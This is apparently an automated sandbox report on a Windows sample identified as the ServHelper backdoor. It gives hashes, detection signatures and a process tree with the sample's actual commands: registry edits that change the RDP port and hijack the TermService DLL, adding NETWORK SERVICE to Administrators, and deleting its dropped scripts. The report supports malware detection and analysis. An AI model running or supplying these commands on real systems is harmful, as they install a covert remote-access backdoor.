Analysis
-
max time kernel
129s -
max time network
125s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
16-10-2021 10:32
Static task
static1
Behavioral task
behavioral1
Sample
2e3b62f4f1669b3615608ea31e1796dd.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
2e3b62f4f1669b3615608ea31e1796dd.exe
Resource
win10-en-20211014
General
-
Target
2e3b62f4f1669b3615608ea31e1796dd.exe
-
Size
6.7MB
-
MD5
2e3b62f4f1669b3615608ea31e1796dd
-
SHA1
9f9584588e480c0cfc18b770da47b00919e24219
-
SHA256
f464dae032967264173885899186be9eac89bd2016ded5ebc38c705fa6b1b625
-
SHA512
2879f87ce2e3c075512408fbdb17a01209663c2f635c3e07cec1d8e9b1f0490c9219eea2229dcd5863467435d35bef874e9d5fd243e46b02850d0157288b95af
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Executes dropped EXE 1 IoCs
pid Process 3536 InstallUtil.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Deletes itself 1 IoCs
pid Process 2344 powershell.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral2/memory/3132-122-0x00000000073F0000-0x0000000007411000-memory.dmp agile_net -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3132 set thread context of 3536 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 70 -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3148 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 2344 powershell.exe 2344 powershell.exe 2344 powershell.exe 624 powershell.exe 624 powershell.exe 624 powershell.exe 584 powershell.exe 584 powershell.exe 584 powershell.exe 2288 powershell.exe 2288 powershell.exe 2288 powershell.exe 2344 powershell.exe 2344 powershell.exe 2344 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 632 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3132 2e3b62f4f1669b3615608ea31e1796dd.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 624 powershell.exe Token: SeDebugPrivilege 584 powershell.exe Token: SeDebugPrivilege 2288 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3132 wrote to memory of 3536 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 70 PID 3132 wrote to memory of 3536 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 70 PID 3132 wrote to memory of 3536 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 70 PID 3132 wrote to memory of 3536 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 70 PID 3132 wrote to memory of 3536 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 70 PID 3132 wrote to memory of 3536 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 70 PID 3132 wrote to memory of 3536 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 70 PID 3132 wrote to memory of 3536 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 70 PID 3132 wrote to memory of 3536 3132 2e3b62f4f1669b3615608ea31e1796dd.exe 70 PID 3536 wrote to memory of 2344 3536 InstallUtil.exe 72 PID 3536 wrote to memory of 2344 3536 InstallUtil.exe 72 PID 3536 wrote to memory of 2344 3536 InstallUtil.exe 72 PID 2344 wrote to memory of 2576 2344 powershell.exe 74 PID 2344 wrote to memory of 2576 2344 powershell.exe 74 PID 2344 wrote to memory of 2576 2344 powershell.exe 74 PID 2576 wrote to memory of 1980 2576 csc.exe 75 PID 2576 wrote to memory of 1980 2576 csc.exe 75 PID 2576 wrote to memory of 1980 2576 csc.exe 75 PID 2344 wrote to memory of 624 2344 powershell.exe 78 PID 2344 wrote to memory of 624 2344 powershell.exe 78 PID 2344 wrote to memory of 624 2344 powershell.exe 78 PID 2344 wrote to memory of 584 2344 powershell.exe 80 PID 2344 wrote to memory of 584 2344 powershell.exe 80 PID 2344 wrote to memory of 584 2344 powershell.exe 80 PID 2344 wrote to memory of 2288 2344 powershell.exe 82 PID 2344 wrote to memory of 2288 2344 powershell.exe 82 PID 2344 wrote to memory of 2288 2344 powershell.exe 82 PID 2344 wrote to memory of 3412 2344 powershell.exe 84 PID 2344 wrote to memory of 3412 2344 powershell.exe 84 PID 2344 wrote to memory of 3412 2344 powershell.exe 84 PID 2344 wrote to memory of 3148 2344 powershell.exe 85 PID 2344 wrote to memory of 3148 2344 powershell.exe 85 PID 2344 wrote to memory of 3148 2344 powershell.exe 85 PID 2344 wrote to memory of 68 2344 powershell.exe 86 PID 2344 wrote to memory of 68 2344 powershell.exe 86 PID 2344 wrote to memory of 68 2344 powershell.exe 86 PID 2344 wrote to memory of 3684 2344 powershell.exe 87 PID 2344 wrote to memory of 3684 2344 powershell.exe 87 PID 2344 wrote to memory of 3684 2344 powershell.exe 87 PID 3684 wrote to memory of 2424 3684 net.exe 88 PID 3684 wrote to memory of 2424 3684 net.exe 88 PID 3684 wrote to memory of 2424 3684 net.exe 88 PID 2344 wrote to memory of 608 2344 powershell.exe 89 PID 2344 wrote to memory of 608 2344 powershell.exe 89 PID 2344 wrote to memory of 608 2344 powershell.exe 89 PID 608 wrote to memory of 204 608 cmd.exe 90 PID 608 wrote to memory of 204 608 cmd.exe 90 PID 608 wrote to memory of 204 608 cmd.exe 90 PID 204 wrote to memory of 184 204 cmd.exe 91 PID 204 wrote to memory of 184 204 cmd.exe 91 PID 204 wrote to memory of 184 204 cmd.exe 91 PID 184 wrote to memory of 1216 184 net.exe 92 PID 184 wrote to memory of 1216 184 net.exe 92 PID 184 wrote to memory of 1216 184 net.exe 92 PID 2344 wrote to memory of 1572 2344 powershell.exe 93 PID 2344 wrote to memory of 1572 2344 powershell.exe 93 PID 2344 wrote to memory of 1572 2344 powershell.exe 93 PID 1572 wrote to memory of 3756 1572 cmd.exe 94 PID 1572 wrote to memory of 3756 1572 cmd.exe 94 PID 1572 wrote to memory of 3756 1572 cmd.exe 94 PID 3756 wrote to memory of 784 3756 cmd.exe 95 PID 3756 wrote to memory of 784 3756 cmd.exe 95 PID 3756 wrote to memory of 784 3756 cmd.exe 95 PID 784 wrote to memory of 2660 784 net.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\2e3b62f4f1669b3615608ea31e1796dd.exe"C:\Users\Admin\AppData\Local\Temp\2e3b62f4f1669b3615608ea31e1796dd.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mcs55g2f\mcs55g2f.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD51E.tmp" "c:\Users\Admin\AppData\Local\Temp\mcs55g2f\CSC27FE41FAA71B45F0B8E9CABA9ADC1DF5.TMP"5⤵PID:1980
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:584
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵PID:3412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
PID:3148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵PID:68
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵PID:2424
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Windows\SysWOW64\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
PID:184 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr7⤵PID:1216
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\SysWOW64\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService7⤵PID:2660
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵PID:3772
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵PID:1780
-
-
-